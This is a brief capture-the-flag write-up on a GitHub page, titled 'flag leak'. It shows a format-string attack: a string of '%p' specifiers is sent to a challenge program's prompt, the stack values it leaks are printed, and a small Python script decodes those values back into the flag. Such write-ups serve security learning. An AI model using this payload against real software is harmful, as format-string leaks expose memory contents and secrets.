Skip to content

Latest commit

 

History

History
22 lines (19 loc) · 1.47 KB

flag leak.md

File metadata and controls

22 lines (19 loc) · 1.47 KB

flag leak

Similar to this

Tell me a story and then I'll tell you one >> %p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p
Here's a story - 
0xffb8aad00xffb8aaf00x80493460x702570250x702570250x702570250x702570250x702570250x702570250x702570250x702570250x702570250x702570250x702570250x70257025
0x702570250x702570250x702570250x702570250x702570250x702570250x702570250x702570250x702570250x702570250x702570250x702570250x702570250x702570250x70257025
0x702570250x702570250x702570250x702570250xf00070250x6f6369700x7b4654430x6b34334c0x5f676e310x67346c460x6666305f0x3474535f0x395f6b630x326539390x7d343238
0xfbad20000xfc89700(nil)0xf0cfa9900x804c0000x8049410(nil)0x804c0000xffb8abb80x80494180x20xffb8ac640xffb8ac70(nil)0xffb8abd0(nil)(nil)0xf0af0ed5
output = "0xffb8aad00xffb8aaf00x80493460x702570250x702570250x702570250x702570250x702570250x702570250x702570250x702570250x702570250x702570250x702570250x702570250x702570250x702570250x702570250x702570250x702570250x702570250x702570250x702570250x702570250x702570250x702570250x702570250x702570250x702570250x702570250x702570250x702570250x702570250x702570250xf00070250x6f6369700x7b4654430x6b34334c0x5f676e310x67346c460x6666305f0x3474535f0x395f6b630x326539390x7d3432380xfbad20000xfc89700"
output = output.split("0x")
for x in output:
    try:
        print(bytes.fromhex(x).decode('utf-8')[::-1], end="")
    except Exception as e:
        pass